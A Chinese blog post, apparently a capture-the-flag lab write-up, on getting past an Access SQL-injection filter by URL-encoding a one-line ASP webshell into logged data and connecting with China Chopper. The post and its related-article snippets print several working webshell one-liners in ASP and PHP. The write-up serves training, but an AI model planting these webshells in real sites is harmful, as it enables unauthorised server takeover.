墨者学院--SQL注入实战(防注入)-Access(菜刀连接超时问题)

最新推荐文章于 2024-05-19 18:10:52 发布
最新推荐文章于 2024-05-19 18:10:52 发布
阅读量901 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/108691503
版权

进入靶场,测试一下,输入and 1=1 ,提示操作被记录
在这里插入图片描述

数据被直接保存在数据库,可以考虑直接把一句话木马传上去
在这里插入图片描述

直接传,发现一句话木马没被传上去,
在这里插入图片描述

将木马进行url编码一下传入。
在这里插入图片描述

使用御剑查找后台。

在这里插入图片描述
上菜刀
在这里插入图片描述

PS:这个靶场有点奇怪,插入一句话木马后,用菜刀可能超时连不上,重置缓存也不行,遇到这种情况,可以尝试换个浏览器,换一个新的菜刀,或者换个工具,冰歇啊,蚁剑都可以。也可以参照其他博主在插入一句话时用 and 1=<%eval request(“a”)%>,具体为什么出现这个问题我也不懂,可能是靶场的问题。希望这些可以给各位提供一点小帮助。

Lin冲啊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4298
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
DVWA中国菜刀连接不上问题(低安全级别就连不上,看看这!!)
S__White的博客
10-30 5885
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马过程省略 解决发生: 解决问题: 将php版本降低为php5.0即可 (小白一枚,解决第一个问题,记录一下,希望可以帮到很多人!!) ...
墨者学院(POST注入
2301_77578012的博客
05-19 425
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具。发现存在注入点,并且给出了我们具体执行的payload格式。(如果大家对工具有需求的话可以q我哈)参数后所跟数据也可以通过抓包获取。1.墨者靶场(POST注入)2.sqlmap工具(主要)3.burpsuite工具。,在需要测试参数后加。
题解--内部文件上传系统漏洞分析溯源---墨者学院菜刀连接失败问题解决)
weixin_43071873的博客
09-01 1592
1.解题方向 1、试探允许上传的文件类型 2、观察服务器在处理完上传任务后返回的内容,获取上传路径 3、尝试修改上传路径,观察服务器是否允许写入权限 4.PS:使用菜刀时可能出现连接不上靶机,可以尝试点击左上角,有个重置缓存,很有可能是因为上次使用菜刀留下的缓存冲突了 进入靶场。 测试可上传的文件,发现txt,jpg,png等格式都可以上传 上传php、asp等都不能上传 2.由于txt可上传,所以可以在txt中写入一句话木马 文件上传到了一个asp文件中,所以可以考虑写入asp一句话 <%eva
利用 Fastjson 注入 Spring 内存马,太秀了~
Java技术栈,分享最主流的Java技术
11-18 813
本文仅供参考学习使用。 1 基础 实际上java内存马的注入已经有很多方式了,我在学习中动手研究并写了一下针对spring mvc应用的内存马。 一般来说实现无文件落地的java内存马注入,通常是利用反序列化漏洞,所以动手写了一个spring mvc的后端,并直接给了一个fastjson反序列化的页面,在假定的攻击中,通过jndi的利用方式让web端加载恶意类,注入controller。 一切工作都是站在巨人的肩膀上,参考文章均在最后列出。 1.1 fastjson反序列化和JNDI 关于fastjson漏
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
中国菜刀+文件上传漏洞一句话木马
dongxieaitonglao的博客
03-19 2232
<?php @eval($_POST['chopper']);?> <?php @eval($_REQUEST['cmd']);?> REQUEST是在网页端输入变量访问,POST则是使用中国菜刀之3类的工具连接,C/S架构。 编辑shell的时候,主机写 localhost egrep命令:查找文件内包含指定字符的文件。 中国菜刀的详细使用: 文件管理,查被上传木马网站的服务器文件架构 数据库管理,在编辑中配置完后,可以连接被上传木马网站的数据库(不知道,所以需要sql注入
黑站利器——中国菜刀
snert的专栏
11-10 8266
中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。 1.中国菜刀支持的服务端脚本:PHP、ASP、ASP.NET、JSP; 2.主要
墨者学院 电子数据取证
zip471642048的博客
05-29 1880
文章目录电子数据取证-流量分析(第1题)网络数据分析溯源(攻击者IP) 电子数据取证-流量分析(第1题) 网络数据分析溯源(攻击者IP) 查看z1的内容,可以知道z5是执行sql的命令
技术剖析中国菜刀原理
p656456564545的专栏
11-06 5532
referer:http://www.cnblogs.com/LittleHann/p/3247106.html 用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵 这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用PHP的一句话来做实验
重新学习--中国菜刀
diecai2192的博客
08-14 1294
1. 菜刀 (1)中国菜刀的请求方式为post。 (2)中国菜刀模拟了百度爬虫的user-agent,中国菜刀默认的连接中使用base64的方式进行编码传输,以便逃脱抓捕。 <?php eval($_POST['x']); ?> 客户端连接设置好URL,密码,连接。 一句话木马的核心就是: PHP eval() 函数 eval() 函数把字符串按照 ...
  中国菜刀使用方法以及小技巧
weixin_33976072的博客
03-31 1646
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特×××形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。...
墨者学院-CMS系统漏洞分析溯源(第3题)
ploto_cs的博客
10-09 540
一.漏洞描述 在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell 二.影响版本 新云CMS 4.0.0 SP1 三.漏洞复现 1.使用御剑对域名进行探测 登录网址为http://219.153.49.228/login.asp 2.注册用户 在“密码问题”插入一句话木马 一句话木马为: <% execute request(“a”)%>” 经过Erlang 中文简体字 GB2312 转 unicode 转换来的 ┼攠數畣整爠煥敵瑳∨≡┩愾 3.检查木马是否上传成功
一句话木马拿shell原理及菜刀的使用
热门推荐
空心菜的博客
04-12 2万+
虽然网上这种文章很多了,但自己不总结一遍不踏实。 一、一句话木马 原理 1.以PHP举例 php的eval()函数:eval($str)函数是把$str当做PHP代码执行。 比如: &lt;?php $a = 233; $str = "echo $a;"; eval($str); ?&gt; 输出结果:233 asp、aspx和php的此...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值